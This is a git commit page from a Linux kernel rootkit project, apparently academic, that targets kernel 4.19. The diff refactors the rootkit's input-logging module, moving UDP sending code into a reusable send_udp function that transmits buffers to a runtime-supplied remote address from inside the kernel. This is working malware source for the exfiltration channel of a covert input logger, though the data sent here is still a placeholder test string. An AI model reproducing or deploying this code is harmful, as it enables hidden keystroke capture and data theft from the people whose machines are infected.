refactors code - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 58926084fb1fc1aed1db5752a8c9399b73b1e9ee
parent e6d2e27d9310c1d5a3e50144c7fbecbfd79b5c06
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 16:35:12 +0100

refactors code

Diffstat:
M src/inputlog.c  | 75 +++++++++++++++++++++++++++++++++++++++++----------------------------------
M src/inputlog.h  | 1 +

2 files changed, 42 insertions(+), 34 deletions(-)
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -11,6 +11,45 @@
 #define UDP_MAX_DATA_LEN 65507
 
 struct socket *sock;
+struct sockaddr_in addr, bind;
+
+void
+send_udp(char *buf, int buflen)
+{
+    int sent, packlen;
+    struct msghdr msg;
+    struct kvec iov;
+    mm_segment_t fs;
+
+    if (!sock)
+        return;
+
+    packlen = 0;
+    msg.msg_control = NULL;
+    msg.msg_controllen = 0;
+    msg.msg_flags = 0;
+    msg.msg_name = &addr;
+    msg.msg_namelen = sizeof(struct sockaddr_in);
+
+    while (buflen > 0) {
+        packlen = (buflen < UDP_MAX_DATA_LEN)
+            ? buflen : UDP_MAX_DATA_LEN;
+
+        iov.iov_len = packlen;
+        iov.iov_base = buf;
+
+        buflen -= packlen;
+        buf += packlen;
+
+        fs = get_fs();
+        set_fs(KERNEL_DS);
+        sent = kernel_sendmsg(sock, &msg, &iov, 1, packlen);
+        set_fs(fs);
+
+        if (sent > 0)
+            DEBUG_INFO("[g7] sent %d bytes\n", sent);
+    }
+}
 
 void
 log_input(const char *ip, const char *port)
@@ -20,12 +59,6 @@ log_input(const char *ip, const char *port)
     unsigned long ip_ul;
     unsigned long port_ul;
 
-    int size;
-    struct sockaddr_in addr, bind;
-    struct msghdr msg;
-    struct kvec iov;
-    mm_segment_t fs;
-
     if (sock)
         return;
 
@@ -56,35 +89,9 @@ log_input(const char *ip, const char *port)
     }
 
     char *buf = "testing\ntesting\ntesting\ntesting";
-    int buflen = strlen(buf), packlen = 0;
-
-    msg.msg_control = NULL;
-    msg.msg_controllen = 0;
-    msg.msg_flags = 0;
-    msg.msg_name = &addr;
-    msg.msg_namelen = sizeof(struct sockaddr_in);
-
-    while (buflen > 0) {
-        packlen = (buflen < UDP_MAX_DATA_LEN)
-            ? buflen : UDP_MAX_DATA_LEN;
-
-        iov.iov_len = packlen;
-        iov.iov_base = buf;
+    int buflen = strlen(buf);
 
-        buflen -= packlen;
-        buf += packlen;
-
-        fs = get_fs();
-        set_fs(KERNEL_DS);
-        size = kernel_sendmsg(sock, &msg, &iov, 1, packlen);
-        set_fs(fs);
-
-        if (size > 0)
-            DEBUG_INFO("[g7] sent %d bytes\n", size);
-    }
-
-    sock_release(sock);
-    sock = NULL;
+    send_udp(buf, buflen);
 }
 
 void
diff --git a/src/inputlog.h b/src/inputlog.h
@@ -1,6 +1,7 @@
 #ifndef _GROUP7_INPUTLOG_H
 #define _GROUP7_INPUTLOG_H
 
+void send_udp(char *, int);
 void log_input(const char *, const char *);
 void unlog_input(void);

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs

M	src/inputlog.c	\|	75	+++++++++++++++++++++++++++++++++++++++++----------------------------------
M	src/inputlog.h	\|	1	+